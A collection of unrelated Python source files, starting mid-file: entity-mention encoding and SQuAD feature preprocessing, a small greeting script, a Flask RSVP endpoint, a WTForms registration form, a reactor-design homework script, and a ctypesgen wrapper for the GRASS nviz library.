model_redirect_mappings self._link_redirect_mappings = link_redirect_mappings self._max_mention_length = max_mention_length self._add_extra_sep_token = add_extra_sep_token self._segment_b_id = segment_b_id self._min_mention_link_prob = min_mention_link_prob def encode(self, title, tokens_a, tokens_b): if self._add_extra_sep_token: mid_sep_tokens = [self._tokenizer.sep_token] * 2 else: mid_sep_tokens = [self._tokenizer.sep_token] all_tokens = [self._tokenizer.cls_token] + tokens_a + mid_sep_tokens + tokens_b + [self._tokenizer.sep_token] word_ids = self._tokenizer.convert_tokens_to_ids(all_tokens) word_segment_ids = [0] * (len(tokens_a) + len(mid_sep_tokens) + 1) + [self._segment_b_id] * (len(tokens_b) + 1) word_attention_mask = [1] * len(all_tokens) try: title = self._link_redirect_mappings.get(title, title) mention_candidates = 
{} ambiguous_mentions = set() for link in self._wiki_link_db.get(title): if link.link_prob < self._min_mention_link_prob: continue link_text = self._normalize_mention(link.text) if link_text in mention_candidates and mention_candidates[link_text] != link.title: ambiguous_mentions.add(link_text) continue mention_candidates[link_text] = link.title for link_text in ambiguous_mentions: del mention_candidates[link_text] except KeyError: mention_candidates = {} logger.warning("Not found in the Dump DB: %s", title) mentions_a = self._detect_mentions(tokens_a, mention_candidates) mentions_b = self._detect_mentions(tokens_b, mention_candidates) all_mentions = mentions_a + mentions_b if not all_mentions: entity_ids = [0, 0] entity_segment_ids = [0, 0] entity_attention_mask = [0, 0] entity_position_ids = [[-1 for y in range(self._max_mention_length)]] * 2 else: entity_ids = [0] * len(all_mentions) entity_segment_ids = [0] * len(mentions_a) + [self._segment_b_id] * len(mentions_b) entity_attention_mask = [1] * len(all_mentions) entity_position_ids = [[-1 for y in range(self._max_mention_length)] for x in range(len(all_mentions))] offset_a = 1 offset_b = len(tokens_a) + 2 # 2 for CLS and SEP tokens if self._add_extra_sep_token: offset_b += 1 for i, (offset, (entity_id, start, end)) in enumerate( chain(zip(repeat(offset_a), mentions_a), zip(repeat(offset_b), mentions_b)) ): entity_ids[i] = entity_id entity_position_ids[i][: end - start] = range(start + offset, end + offset) if len(all_mentions) == 1: entity_ids.append(0) entity_segment_ids.append(0) entity_attention_mask.append(0) entity_position_ids.append([-1 for y in range(self._max_mention_length)]) return dict( tokens=all_tokens, mentions=all_mentions, word_ids=word_ids, word_segment_ids=word_segment_ids, word_attention_mask=word_attention_mask, entity_ids=entity_ids, entity_position_ids=entity_position_ids, entity_segment_ids=entity_segment_ids, entity_attention_mask=entity_attention_mask, ) def _detect_mentions(self, tokens, mention_candidates): mentions = [] cur = 0 for start, token in enumerate(tokens): if start < cur: continue if self._is_subword(token): continue for end in range(min(start + self._max_mention_length, len(tokens)), start, -1): if end < len(tokens) and self._is_subword(tokens[end]): continue mention_text = self._tokenizer.convert_tokens_to_string(tokens[start:end]) mention_text = self._normalize_mention(mention_text) if mention_text in mention_candidates: cur = end title = mention_candidates[mention_text] title = self._model_redirect_mappings.get(title, title) # resolve mismatch between two dumps if title in self._entity_vocab: mentions.append((self._entity_vocab[title], start, end)) break return mentions def _is_subword(self, token): if isinstance(self._tokenizer, RobertaTokenizer): token = self._tokenizer.convert_tokens_to_string(token) if not token.startswith(" ") and not self._is_punctuation(token[0]): return True elif token.startswith("##"): return True return False @staticmethod def _is_punctuation(char): # obtained from: # https://github.com/huggingface/transformers/blob/5f25a5f367497278bf19c9994569db43f96d5278/transformers/tokenization_bert.py#L489 cp = ord(char) if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126): return True cat = unicodedata.category(char) if cat.startswith("P"): return True return False @staticmethod def _normalize_mention(text): return " ".join(text.lower().split(" ")).strip() params = None def _initialize_worker(_params): global params 
params = _params def _process_example(args): example_index, example = args tokenizer = params.tokenizer query_tokens = _tokenize(example.question_text) if len(query_tokens) > params.max_query_length: query_tokens = query_tokens[0 : params.max_query_length] tok_to_orig_index = [] orig_to_tok_index = [] all_doc_tokens = [] for i, token in enumerate(example.doc_tokens): orig_to_tok_index.append(len(all_doc_tokens)) sub_tokens = _tokenize(token) for sub_token in sub_tokens: tok_to_orig_index.append(i) all_doc_tokens.append(sub_token) tok_start_positions = [] tok_end_positions = [] if params.is_training and not example.is_impossible: for start, end, answer_text in zip(example.start_positions, example.end_positions, example.answer_texts): tok_start = orig_to_tok_index[start] if end < len(example.doc_tokens) - 1: tok_end = orig_to_tok_index[end + 1] - 1 else: tok_end = len(all_doc_tokens) - 1 tok_start, tok_end = _improve_answer_span(all_doc_tokens, tok_start, tok_end, tokenizer, answer_text) tok_start_positions.append(tok_start) tok_end_positions.append(tok_end) max_tokens_for_doc = params.max_seq_length - len(query_tokens) - 3 if params.add_extra_sep_token: max_tokens_for_doc -= 1 doc_spans = [] start_offset = 0 while start_offset < len(all_doc_tokens): length = len(all_doc_tokens) - start_offset if length > max_tokens_for_doc: length = max_tokens_for_doc doc_spans.append(dict(start=start_offset, length=length)) if start_offset + length == len(all_doc_tokens): break start_offset += min(length, params.doc_stride) features = [] for doc_span_index, doc_span in enumerate(doc_spans): token_to_orig_map = {} token_is_max_context = {} answer_tokens = [] answer_offset = len(query_tokens) + 2 if params.add_extra_sep_token: answer_offset += 1 for i in range(doc_span["length"]): split_token_index = doc_span["start"] + i token_to_orig_map[answer_offset + i] = tok_to_orig_index[split_token_index] is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index) token_is_max_context[answer_offset + i] = is_max_context answer_tokens.append(all_doc_tokens[split_token_index]) start_positions = [] end_positions = [] if params.is_training: if example.is_impossible: start_positions = [0] end_positions = [0] else: doc_start = doc_span["start"] doc_end = doc_span["start"] + doc_span["length"] - 1 for tok_start, tok_end in zip(tok_start_positions, tok_end_positions): if not (tok_start >= doc_start and tok_end <= doc_end): continue doc_offset = len(query_tokens) + 2 if params.add_extra_sep_token: doc_offset += 1 start_positions.append(tok_start - doc_start + doc_offset) end_positions.append(tok_end - doc_start + doc_offset) if not start_positions: start_positions = [0] end_positions = [0] features.append( InputFeatures( unique_id=None, example_index=example_index, doc_span_index=doc_span_index, token_to_orig_map=token_to_orig_map, token_is_max_context=token_is_max_context, start_positions=start_positions, end_positions=end_positions, **params.passage_encoder.encode(example.title, query_tokens, answer_tokens) ) ) return features def _tokenize(text): if isinstance(params.tokenizer, RobertaTokenizer): return params.tokenizer.tokenize(text, add_prefix_space=True) else: return params.tokenizer.tokenize(text) def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text): """Returns tokenized answer spans that better match the annotated answer. 
Original version was obtained from here: https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L25 """ tok_answer_text = tokenizer.convert_tokens_to_string(_tokenize(orig_answer_text)).strip() for new_start in range(input_start, input_end + 1): for new_end in range(input_end, new_start - 1, -1): text_span = tokenizer.convert_tokens_to_string(doc_tokens[new_start : (new_end + 1)]).strip() if text_span == tok_answer_text: return new_start, new_end return input_start, input_end def _check_is_max_context(doc_spans, cur_span_index, position): """Check if this is the 'max context' doc span for the token. Original version was obtained from here: https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L38 """ best_score = None best_span_index = None for span_index, doc_span in enumerate(doc_spans): end = doc_span["start"] + doc_span["length"] - 1 if position < doc_span["start"]: continue if position > end: continue num_left_context = position - doc_span["start"] num_right_context = end - position score = min(num_left_context, num_right_context) + 0.01 * doc_span["length"] if best_score is None or score > best_score: best_score = score best_span_index = span_index return cur_span_index == best_span_index
python
name = input("Hello! What's your name? ") print('Nice to meet you \033[31m{}\033[m!'.format(name))
python
""" This file handles Reservation related HTTP request. """ from flask import request from flask_restplus import Resource from flask_jwt_extended import jwt_required from flask_jwt_extended.exceptions import NoAuthorizationError,InvalidHeaderError,RevokedTokenError from jwt import ExpiredSignatureError, InvalidTokenError, InvalidAudienceError # local imports from api.v1.main.service.rsvp_service import save_new_rsvp from api.v1.main.util.rvsp_dto import RsvpDto api = RsvpDto.api rsvp = RsvpDto.rsvp @api.route('/<int:meetup_id>/rsvp') @api.param('meetup_id', 'Meetup Identification') @api.errorhandler(NoAuthorizationError) @api.errorhandler(RevokedTokenError) @api.errorhandler(ExpiredSignatureError) @api.errorhandler(InvalidTokenError) @api.errorhandler(InvalidHeaderError) class CreateQuestion(Resource): @api.response(201, 'You have successfully reserved a meetup') @api.doc('Reserve a meetup') @api.expect(rsvp, validate=True) @api.doc(security='Bearer Auth') @jwt_required def post(self, meetup_id): """ Reserve a meetup """ input_data = request.json return save_new_rsvp(user_input=input_data, meetup_id=meetup_id)
python
from wtforms import Form, StringField, PasswordField, SubmitField, BooleanField from wtforms.validators import DataRequired, Length, Email from flask_wtf import FlaskForm class RegistrationForm(FlaskForm): email = StringField( 'Email', [DataRequired(), Email(), Length(min=6, max=36)]) username = StringField( 'Username', [DataRequired(), Length(min=3, max=36)]) password = PasswordField( 'Password', [DataRequired(), Length(min=8, max=36)]) remember_me = BooleanField('Remember Me') submit = SubmitField('Sign Up')
python
#!/usr/bin/env python
# coding=utf-8

"""
Calcs for HW3
"""

from __future__ import print_function

import sys
import numpy as np

from common import GOOD_RET, R_J, temp_c_to_k, k_at_new_temp, R_ATM, make_fig

__author__ = 'hbmayes'


def pfr_design_eq(x_out, x_in, vol, nuo, k):
    """
    PFR design eq for HW3 problem 1, set up for f(Xi) = 0 for fsolve function
    :param x_in: initial conversion (unitless)
    :param x_out: final conversion (unitless)
    :param vol: PFR volume in L
    :param nuo: volumetric flow in L/min
    :param k: rate coefficient in 1/min
    :return: function residual (want close to zero)
    """
    return vol - nuo / k * (4.0 * np.log(1 / (1 - x_out)) - 3.0 * x_out - 4.0 * np.log(1 / (1 - x_in)) + 3.0 * x_in)


def cstr_design_eq(x_out, x_in, vol, nuo, k):
    """
    CSTR design eq for HW3 problem 1, set up for f(Xi) = 0 for fsolve function
    :param x_in: initial conversion (unitless)
    :param x_out: final conversion (unitless)
    :param vol: CSTR volume in L
    :param nuo: volumetric flow in L/min
    :param k: rate coefficient in 1/min
    :return: function residual (want close to zero)
    """
    return vol - nuo / k * (x_out - x_in) * (1 + 3 * x_out) / (1 - x_out)


def r_dis_a(k, cao, x, k_equil):
    """
    rate of consumption (disappearance) of species A for HW3 prob 1
    :param k: rate coefficient at temp of interest (1/min)
    :param cao: initial concentration of A in mol/L
    :param x: conversion of A
    :param k_equil: equilibrium constant (L/mol)
    :return: rate in mol/L-min
    """
    return 2.0 * k * cao * (cao * np.square(1 - x) - x / (2 * k_equil))


def pfr_design(k, cao, x, k_equil, nuo):
    """
    Levenspiel-plot quantity FA0/(-rA) for species A for HW3 prob 1
    :param k: rate coefficient at temp of interest (1/min)
    :param cao: initial concentration of A in mol/L
    :param x: conversion of A
    :param k_equil: equilibrium constant (L/mol)
    :param nuo: volumetric flow in L/min
    :return: FA0/(-rA) in L
    """
    return nuo / (2.0 * k * (cao * np.square(1 - x) - x / (2 * k_equil)))


# noinspection PyTypeChecker
def prob1a():
    """
    Creates the Levenspiel plot for HW3 problem 1a
    :return: nothing--saves a file with the graph
    """
    cao = 0.2  # mol / L
    nuo = 10.0  # L / s
    k_equil = 20.0  # L / mol
    k = 0.2  # L / mol s
    fao = cao * nuo
    vol = 600.0  # L
    tau = vol / nuo  # s

    # x_in = 0.0
    # x_out = 0.65
    x_in = np.zeros(4)
    x_out = np.empty(4)
    print(x_in)

    x_begin = 0.0
    x_end = 0.65
    x_cstr = np.array([x_begin, x_end])
    x_pfr = np.linspace(x_begin, x_end, 10001)
    neg_ra = r_dis_a(k, cao, x_pfr, k_equil)
    leven_cstr = np.empty(2)
    leven_cstr.fill(fao / neg_ra[-1])
    leven_pfr = fao / neg_ra

    fig_name = 'lect06_alt'
    volume_limit = 2000
    make_fig(fig_name, x_pfr, leven_pfr,
             x_label=r'conversion (X, unitless)',
             y_label=r'$\displaystyle\frac{F_{A0}}{-r_A} \left(L\right)$',
             x_lima=0.0, x_limb=0.65,
             y_lima=0.0, y_limb=volume_limit,
             color1="black",
             x_fill=x_cstr, y_fill=leven_cstr,
             x2_fill=x_pfr, y2_fill=leven_pfr,
             # fill1_label="CSTR", fill2_label="PFR",
             )
    print("yo")


def main():
    """ Runs the main program. """
    prob1a()
    return GOOD_RET  # success


if __name__ == '__main__':
    status = main()
    sys.exit(status)
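# --- Hedged usage sketch (not part of the original assignment script) ---
# The design equations above are written as residuals f(X) = 0 (the docstrings
# mention fsolve); a bracketed root finder, scipy.optimize.brentq, is used here
# instead because the residuals blow up as X -> 1. The parameter values are
# illustrative only, not necessarily the HW3 values; scipy is assumed available.
def _example_solve_conversion():
    from scipy.optimize import brentq
    x_in, vol, nuo, k = 0.0, 600.0, 10.0, 0.2
    # Residuals change sign between X = 0 and X = 0.99, so the bracket is valid.
    x_pfr_out = brentq(pfr_design_eq, 0.0, 0.99, args=(x_in, vol, nuo, k))
    x_cstr_out = brentq(cstr_design_eq, 0.0, 0.99, args=(x_in, vol, nuo, k))
    return x_pfr_out, x_cstr_out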
python
'''Wrapper for nviz.h Generated with: ./ctypesgen.py --cpp gcc -E -I/Applications/GRASS-7.8.app/Contents/Resources/include -D_Nullable= -I/Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include -I/Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include -D__GLIBC_HAVE_LONG_LONG -lgrass_nviz.7.8 /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h -o OBJ.x86_64-apple-darwin18.7.0/nviz.py Do not modify this file. ''' __docformat__ = 'restructuredtext' _libs = {} _libdirs = [] from .ctypes_preamble import * from .ctypes_preamble import _variadic_function from .ctypes_loader import * add_library_search_dirs([]) # Begin libraries _libs["grass_nviz.7.8"] = load_library("grass_nviz.7.8") # 1 libraries # End libraries # No modules # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/CGLTypes.h: 45 class struct__CGLContextObject(Structure): pass CGLContextObj = POINTER(struct__CGLContextObject) # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/CGLTypes.h: 45 GLubyte = c_uint8 # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/gltypes.h: 18 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 76 class struct_anon_1348(Structure): pass struct_anon_1348.__slots__ = [ 'id', 'brt', 'r', 'g', 'b', 'ar', 'ag', 'ab', 'x', 'y', 'z', 'w', ] struct_anon_1348._fields_ = [ ('id', c_int), ('brt', c_float), ('r', c_float), ('g', c_float), ('b', c_float), ('ar', c_float), ('ag', c_float), ('ab', c_float), ('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float), ] light_data = struct_anon_1348 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 76 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 78 class struct_fringe_data(Structure): pass struct_fringe_data.__slots__ = [ 'id', 'color', 'elev', 'where', ] struct_fringe_data._fields_ = [ ('id', c_int), ('color', c_ulong), ('elev', c_float), ('where', c_int * 4), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 86 class struct_arrow_data(Structure): pass struct_arrow_data.__slots__ = [ 'color', 'size', 'where', ] struct_arrow_data._fields_ = [ ('color', c_ulong), ('size', c_float), ('where', c_float * 3), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 93 class struct_scalebar_data(Structure): pass struct_scalebar_data.__slots__ = [ 'id', 'color', 'size', 'where', ] struct_scalebar_data._fields_ = [ ('id', c_int), ('color', c_ulong), ('size', c_float), ('where', c_float * 3), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 130 class struct_anon_1349(Structure): pass struct_anon_1349.__slots__ = [ 'zrange', 'xyrange', 'num_cplanes', 'cur_cplane', 'cp_on', 'cp_trans', 'cp_rot', 'light', 'num_fringes', 'fringe', 'draw_arrow', 'arrow', 'num_scalebars', 'scalebar', 'bgcolor', ] struct_anon_1349._fields_ = [ ('zrange', c_float), ('xyrange', c_float), ('num_cplanes', c_int), ('cur_cplane', c_int), ('cp_on', c_int * 6), 
('cp_trans', (c_float * 3) * 6), ('cp_rot', (c_float * 3) * 6), ('light', light_data * 3), ('num_fringes', c_int), ('fringe', POINTER(POINTER(struct_fringe_data))), ('draw_arrow', c_int), ('arrow', POINTER(struct_arrow_data)), ('num_scalebars', c_int), ('scalebar', POINTER(POINTER(struct_scalebar_data))), ('bgcolor', c_int), ] nv_data = struct_anon_1349 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 130 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 132 class struct_render_window(Structure): pass struct_render_window.__slots__ = [ 'contextId', 'width', 'height', ] struct_render_window._fields_ = [ ('contextId', CGLContextObj), ('width', c_int), ('height', c_int), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 5 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_resize_window'): continue Nviz_resize_window = _lib.Nviz_resize_window Nviz_resize_window.argtypes = [c_int, c_int] Nviz_resize_window.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 6 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_update_ranges'): continue Nviz_update_ranges = _lib.Nviz_update_ranges Nviz_update_ranges.argtypes = [POINTER(nv_data)] Nviz_update_ranges.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 7 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_position'): continue Nviz_set_viewpoint_position = _lib.Nviz_set_viewpoint_position Nviz_set_viewpoint_position.argtypes = [c_double, c_double] Nviz_set_viewpoint_position.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 8 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_viewpoint_position'): continue Nviz_get_viewpoint_position = _lib.Nviz_get_viewpoint_position Nviz_get_viewpoint_position.argtypes = [POINTER(c_double), POINTER(c_double)] Nviz_get_viewpoint_position.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 9 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_height'): continue Nviz_set_viewpoint_height = _lib.Nviz_set_viewpoint_height Nviz_set_viewpoint_height.argtypes = [c_double] Nviz_set_viewpoint_height.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 10 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_viewpoint_height'): continue Nviz_get_viewpoint_height = _lib.Nviz_get_viewpoint_height Nviz_get_viewpoint_height.argtypes = [POINTER(c_double)] Nviz_get_viewpoint_height.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 11 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_persp'): continue Nviz_set_viewpoint_persp = _lib.Nviz_set_viewpoint_persp Nviz_set_viewpoint_persp.argtypes = [c_int] Nviz_set_viewpoint_persp.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 12 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_twist'): continue Nviz_set_viewpoint_twist = _lib.Nviz_set_viewpoint_twist Nviz_set_viewpoint_twist.argtypes = [c_int] 
Nviz_set_viewpoint_twist.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 13 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_change_exag'): continue Nviz_change_exag = _lib.Nviz_change_exag Nviz_change_exag.argtypes = [POINTER(nv_data), c_double] Nviz_change_exag.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 14 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_look_here'): continue Nviz_look_here = _lib.Nviz_look_here Nviz_look_here.argtypes = [c_double, c_double] Nviz_look_here.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 15 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_modelview'): continue Nviz_get_modelview = _lib.Nviz_get_modelview Nviz_get_modelview.argtypes = [POINTER(c_double)] Nviz_get_modelview.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 16 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_rotation'): continue Nviz_set_rotation = _lib.Nviz_set_rotation Nviz_set_rotation.argtypes = [c_double, c_double, c_double, c_double] Nviz_set_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 17 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_unset_rotation'): continue Nviz_unset_rotation = _lib.Nviz_unset_rotation Nviz_unset_rotation.argtypes = [] Nviz_unset_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 18 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_rotation'): continue Nviz_init_rotation = _lib.Nviz_init_rotation Nviz_init_rotation.argtypes = [] Nviz_init_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 19 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_flythrough'): continue Nviz_flythrough = _lib.Nviz_flythrough Nviz_flythrough.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_int), c_int] Nviz_flythrough.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 22 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_cplane'): continue Nviz_new_cplane = _lib.Nviz_new_cplane Nviz_new_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_new_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 23 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_on_cplane'): continue Nviz_on_cplane = _lib.Nviz_on_cplane Nviz_on_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_on_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 24 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_off_cplane'): continue Nviz_off_cplane = _lib.Nviz_off_cplane Nviz_off_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_off_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 25 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_cplane'): continue Nviz_draw_cplane = _lib.Nviz_draw_cplane Nviz_draw_cplane.argtypes = 
[POINTER(nv_data), c_int, c_int] Nviz_draw_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 26 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_num_cplanes'): continue Nviz_num_cplanes = _lib.Nviz_num_cplanes Nviz_num_cplanes.argtypes = [POINTER(nv_data)] Nviz_num_cplanes.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 27 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_current_cplane'): continue Nviz_get_current_cplane = _lib.Nviz_get_current_cplane Nviz_get_current_cplane.argtypes = [POINTER(nv_data)] Nviz_get_current_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 28 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_rotation'): continue Nviz_set_cplane_rotation = _lib.Nviz_set_cplane_rotation Nviz_set_cplane_rotation.argtypes = [POINTER(nv_data), c_int, c_float, c_float, c_float] Nviz_set_cplane_rotation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 29 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_cplane_rotation'): continue Nviz_get_cplane_rotation = _lib.Nviz_get_cplane_rotation Nviz_get_cplane_rotation.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), POINTER(c_float), POINTER(c_float)] Nviz_get_cplane_rotation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 30 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_translation'): continue Nviz_set_cplane_translation = _lib.Nviz_set_cplane_translation Nviz_set_cplane_translation.argtypes = [POINTER(nv_data), c_int, c_float, c_float, c_float] Nviz_set_cplane_translation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 31 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_cplane_translation'): continue Nviz_get_cplane_translation = _lib.Nviz_get_cplane_translation Nviz_get_cplane_translation.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), POINTER(c_float), POINTER(c_float)] Nviz_get_cplane_translation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 32 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_fence_color'): continue Nviz_set_fence_color = _lib.Nviz_set_fence_color Nviz_set_fence_color.argtypes = [POINTER(nv_data), c_int] Nviz_set_fence_color.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 33 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_here'): continue Nviz_set_cplane_here = _lib.Nviz_set_cplane_here Nviz_set_cplane_here.argtypes = [POINTER(nv_data), c_int, c_float, c_float] Nviz_set_cplane_here.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 37 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all_surf'): continue Nviz_draw_all_surf = _lib.Nviz_draw_all_surf Nviz_draw_all_surf.argtypes = [POINTER(nv_data)] Nviz_draw_all_surf.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 38 for _lib in 
six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_all_vect'):
        continue
    Nviz_draw_all_vect = _lib.Nviz_draw_all_vect
    Nviz_draw_all_vect.argtypes = []
    Nviz_draw_all_vect.restype = c_int
    break

# grass/defs/nviz.h: 39
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_all_site'):
        continue
    Nviz_draw_all_site = _lib.Nviz_draw_all_site
    Nviz_draw_all_site.argtypes = []
    Nviz_draw_all_site.restype = c_int
    break

# grass/defs/nviz.h: 40
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_all_vol'):
        continue
    Nviz_draw_all_vol = _lib.Nviz_draw_all_vol
    Nviz_draw_all_vol.argtypes = []
    Nviz_draw_all_vol.restype = c_int
    break

# grass/defs/nviz.h: 41
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_all'):
        continue
    Nviz_draw_all = _lib.Nviz_draw_all
    Nviz_draw_all.argtypes = [POINTER(nv_data)]
    Nviz_draw_all.restype = c_int
    break

# grass/defs/nviz.h: 42
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_draw_quick'):
        continue
    Nviz_draw_quick = _lib.Nviz_draw_quick
    Nviz_draw_quick.argtypes = [POINTER(nv_data), c_int]
    Nviz_draw_quick.restype = c_int
    break

# grass/defs/nviz.h: 43
for _lib in six.itervalues(_libs):
    if not hasattr(_lib, 'Nviz_load_image'):
        continue
    Nviz_load_image = _lib.Nviz_load_image
